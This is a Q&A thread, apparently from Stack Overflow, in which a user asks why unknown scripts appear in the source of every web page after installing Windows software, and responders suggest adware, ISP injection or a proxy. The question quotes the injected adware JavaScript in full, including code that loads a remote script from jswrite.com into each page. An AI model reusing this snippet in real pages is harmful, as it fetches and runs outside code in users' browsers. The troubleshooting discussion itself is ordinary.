# Scripts appears automatically in web pages

Tags: javascript, html, browser, add-on

Today the following scripts appears (only in View-Source) in the  tags all web pages in the browser automatically. The script not only in my php projects, but also all the pages opening in the browser. If I do view source of this stackoverflow page, I can find the scripts inside.

```
<script>if(typeof window.__wsujs==='undefined'){window.__wsujs=7123;window.__wsujsn='OffersWizard';window.__wsujss='DBCD7AEAE3ED09528E88443FCA6591CC';} </script> 
<script>if(top == self && typeof window._ws_all_js==='undefined'){ 
window._ws_all_js = 7; 
var zhead = document.getElementsByTagName('head')[0]; 
if(!zhead){zhead = document.createElement('head');} 
var qscript = document.createElement('script'); 
qscript.setAttribute('id','wsh2_js'); 
qscript.setAttribute('src','http://jswrite.com/script1.js'); 
qscript.setAttribute('type','text/javascript');qscript.async = true; 
if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); 
} </script>
```

I thought the thing comes from the browser add-ons or some softwares, because last day I had installed a few sofwares for windows, from that some browser addons automatically installed. So I uninstalled the softwares installed last day and the browser addons.

But still the scripts appears?

Comment: Try with different browsers, looks like malware from one addon.

Post the browser affected and maybe we can help.

Comment: All the browsers same problem.

Answer (score 1):

<s>This appears to be an ad script. Possible causes are:</s>

- Your host might add this, especially free hosts do this.
- You may have malicious code on your server, are you using WordPress with plugins?

It's most likely just your host though. Thought you were hosting a website

Well, in this case there are a few possible causes:

- Your internet provider may serve you all pages with that script inside.
- Your computer may be infected with malware or spyware.
- Are you surfing via proxy?
- This isn't a browser extension as browser extensions cannot modify source (only DOM)

Comment: Thanks. this appears only in my computer

Comment: If I do view source of this stackoverflow page, I can find the scripts inside

Comment: May be have the malware infected (2 point), this thing happened today only after i installed the software last day